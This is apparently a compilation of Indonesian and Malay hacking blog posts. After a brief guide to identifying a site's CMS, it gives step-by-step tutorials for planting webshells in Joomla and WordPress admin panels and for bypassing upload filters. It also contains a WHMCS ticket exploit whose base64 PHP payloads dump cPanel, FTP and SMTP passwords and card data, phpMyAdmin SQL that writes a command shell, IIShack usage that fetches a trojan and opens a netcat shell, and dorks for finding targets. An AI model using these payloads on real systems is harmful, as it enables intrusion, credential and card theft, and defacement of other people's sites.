Cara mengetahui CMS atau basis suatu web

             

CMS atau Content management system adalah suatu alat untuk memudahkan kita mengolah suatu konten, CMS digunakan untuk mempermudah pembuat dalam mengolah websitenya ada bermacam-macam CMS yang biasa digunakan ada Blogger, Wordpress, Joomla, Drupal dll nah lalu bagaimana cara kita mengetahui CMS suatu situs ? caranya yaitu dengan menebak :D hahhaha, bisa menebak dari link web, tampilan, dll nah untuk memudahkan kita kunjungi website untuk menebak CMS

http://guess.scritch.org/

Tinggal masukkan situs yang ingin kita 'tebak' lalu klik guess, kira-kira seperti ini sob :

Selain situs diatas terdapat juga addons dan situs lainnya

Builtwith.com

wappalyzer (firefox dan chrome)
Chrome Sniffer (untuk chrome)

Oke sob semoga bermanfaat.
                   

Cara upload shell joomla

1.Cara Upload Shell di Joomla

           Joomla merupakan sistem manajemen konten (cms) yang bebas dan terbuka, kebanyakan web pemerintahan maupun sekolahan menggunakan web berbasis joomla. Joomla memiliki banyak versi. Kali ini saya akan tunjukkan cara upload shell pada joomla.

1. Siapkan dulu file shellnya, jika belum punya bisa anda download disini

2. Anda harus punya akses masuk ke target joomla, bisa menggunakan teknik SQL Injection, cari disini

3. Download dulu template joomla ini untuk mengsukseskan cara ini

4. Masuk ke page admin joomla melalui www.site.com/admin / www.site.com/administrator

5. Klik installer -> template - site

6. Selanjutnya, upload template joomla yang tadi anda download dengan cara klik "browse" lalu klik "upload file & install"

7. Setelah proses installnya selesai, klik "continue"

8. Centang template baru yang tadi di upload kemudian klik "edit html"

9. Hapus semua text yang ada disitu dan ganti dengan script shellmu. (Klik kanan pada file shellmu, open with notepad, nah itu script shellmu). Jangan lupa klik "Save"

10. Setelah kalian edit, kalian buka shell anda dengan membuka link shellnya

Perhatikan gambar

11. Nah anda buka link itu di tab baru dan taadaa... Shell kalian muncul! Silahkan anda edit file index.php di shell anda dan rubah dengan script deface anda. Buka www.site.com dan berubahlah dia

Selamat mencoba ^_^

2.dengan cara upload

Simak baik-baik dan jangan ada yang terlewat

Bahan
1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar

2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg



3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper



6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request



7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Maaf kalo Post amburadul akhir kata saya ucapkan terima kasih membaca trith ini dan Semua cendol di terima

3.Cara Mudah Tanam Backdoor Shell di Wordpress

Akhirnya keluar juga artikel yang sudah saya siapkan sekitar seminggu yang lalu. Memasang webshell pada platform Wordpress. Ya, kadang teman-teman masih kebingungan karena sudah berhasil masuk ke wordpress, tapi bingung cara memasang backdoornya. Oleh karena itu kali ini saya akan berbagi tips Cara Mudah Memasang Backdoor di Wordpress.
Langsung saja, saya asumsikan sobat sudah mendapat korban. Entah itu dari hasil ngemis, nyolong, atau bruteforce. Langsung saja login.

Step 1

Tampilannya akan seperti diatas. Oke, sekarang kita pasang exploit berikut. www.site.com/wp-admin/theme-editor.php

Maka sobat akan dibawa menuju editor template seperti gambar di bawah :

Step 2

Oke. Sampir berhasil. Saatnya kita pasang backdoor. Edit salah satu menu template yang ada samping kanan. Untuk mempermudah, edit saja bagian 404.php dengan script shell kita.

Jika berhasil, maka akan ada notice, File Edited Successfully

Step 3

Oke. Saatnya kita panggil backdoor kita dengan exploit berikut. site/wp-content/themes/[nama tema]/[file.php] . Karena tadi saya mengedit file 404.php pada teme clique, maka cara memanggil bbackdoornya adalah , www.cinepixtor.com/wp-content/themes/clique/404.php

Step 4

Gotchaaaa !!! backdoor sukses diakses. Sekarang terserah anda mau diapain. Kalo kasian ya jangan didepes. Tapi kalo nggak kasian [seperti saya] silahkan dihajar indexnya.

Last Step

Lumayan tuh bisa majang foto Nabilah. Hohohohoho.

Tapi apa sih tujuan deface ? Banyak. Hobby, test security sampai ada yang merusak. Tapi disini saya hanya menguji keamanan saja. Tidak ada niat untuk merusak. Jadi, jangan merusak index asli. Upload saja file di public_html dengan nama index.html . Itu sudah menjadi halaman utama deface. Kasian adminnnya kalo sampe index asli dihapus. Oke ?!

Untuk situs diatas, mungkin sekarang sedang dalam perbaikan atau malah sudah diperbaiki saat anda membaca artikel ini.

Silahkan lihat mirrornya disini : http://www.zone-h.org/mirror/id/19551101

NB : tutorial yang saya berikan hanya untuk pembelajaran, resiko tanggung sendiri. :p

4.Assalamualaikum dan salam sejahtera, kali ini aku akan bagi kamu exploit untuk hack WHMCS.Exploit ini kita boleh dapatkan username dan password CPanel website2 yang di-host di dalam WHMCS mangsa kita.Selain itu kita juga boleh upload shell :)

100% Credit DevilCafe & Hacking&Security.

aku cuma translate ja....

1. Cari website hosting dan cari perkataan "Submit Ticket".
kamu juga bisa gunakan google dork :
"Powered By WHMCompleteSolution" inurl:submitticket.php

2. Sekarang click "Submit Ticket" dan click bagian "Sales Department".

3. Seterusnya kita perlu mengisi kotak2 kosong yang disediakan.
Isikan saja apa2 pun.
TETAPI!Yang penting adalah kotak Subject!
Kita perlu isikan kotak ini dengan code php.

Isikan kotak Subject tu dengan code ini :

{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICdyb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb21haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjYXJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJGNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjdCBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbnVtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUVTX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFFU19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiANCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw=='));exit;{/php}

Kemudian scroll turun bawah,isikan captcha dan click submit.



4. Seterusnya kita akan di-redirected ke page baru dimana akan terpapar username dan password cpanel!Tadaaa!!! korang dah dapat username dan password account2 cpanel yang di hostkan di dalam whmcs tu.
Kalau kamu bernasib baik kamu juga mungkin akan dapat password FTP dan SMTP!

5. Seterusnya!Tunggu...tak habis lagi.....kita ada lagi satu cara!
cara ini adalah untuk mengupload SHELL!
Ok bro!

Kembali ke borang submit ticket tadi dan masukkan apa2 dalam kotak2 tu kecuali kotak SUBJECT.

Kita akan letakkan code php di dalam kotak subject dan jika berhasil,kita akan dapat upload pada website tersebut dan dapat upload shell.
Step ini sama macam tadi dan yang penting sekali kotak SUBJECT.

6. Isikan kotak SUBJECT dengan code ini :

{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

Selepas isi semua dan captcha,click submit.Seterusnya kita akan ubah url untuk cari uploader itu.

Caranya :
http://www.website.com/client/submitticket.php 

Gantikan submitticket.php dengan :
/downloads/indexx.php

Url dia akan jadi macam ni :
http://www.website.com/client/downloads/indexx.php

Buka link itu dan kamu akan lihat tempat untuk upload!
Sekarang upload lah shell kamu!

Untuk lihat hasil :
http://www.website.com/client/downloads/shell_name.php


Baiklah sampai sini saja untuk entry kali ini.Semoga bermanfaat!!!

5.Cara Tanam Shell Melalui PHPMYADMIN

hari ini target gue buat isi postingan semua label udah terpenuhi,cuman bingung,enaknya di label hacking ane post apa ya,akhirnya setelah dipikir mateng-mateng,akhirnya ketemu juga inspirasi buat posting
TUTORIAL CARA TANAM SHELL MELALU PHPMYADMIN
langsung aja deh,ga kebanyakan bacot

dork:
inurl:/security/security.php
inurl:/phpmyadmin/index.php
dll gunakan logikanya aja...

kalo udah ketemu targetnya kita mulai:

UPDATE:

Ane juga pernah nyobain di localhost
PhpMyAdmin yang ane pakai bawaan dari LAMPP (Linux) yaitu versi 3.2.4

Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Klik Go!

Note : Jika XAMPP terinstall di direktori lain, silahkan ganti codingnya di bagian SELECT * INTO OUTFILE 'alamat htdocs nya xampp/cmd.php' from temptab;

Oke ane anggap hasilnya seperti ini :
Your SQL Query has been executed successful

Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : http://localhost/cmd.php?cmd=ls <-- ls adalah perintah untuk ngeliat isi file dan direktori di mesin Linux, kalo Windows ya pake dir.

Lanjut lagi!
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!

Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*Untuk mesin Windows

Code:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php

Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.

add me : www.facebook.com/sandip.ok

calculator MD5

Calculator MD5 http://http://www.md5calc.com/

Hack web servers Tutor

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
 www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,

which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,

any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
 but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

Cara menggunakan Google Dork

Memanfaatkan Dork Sebagai Senjata Hacking

Pengenalan tentang google dorks :

Type-type dalam penggunaannya ada beberapa macam diantaranya:

intitle

allintitle

(Mencari judul/title pada suatu web)

inurl

allinurl

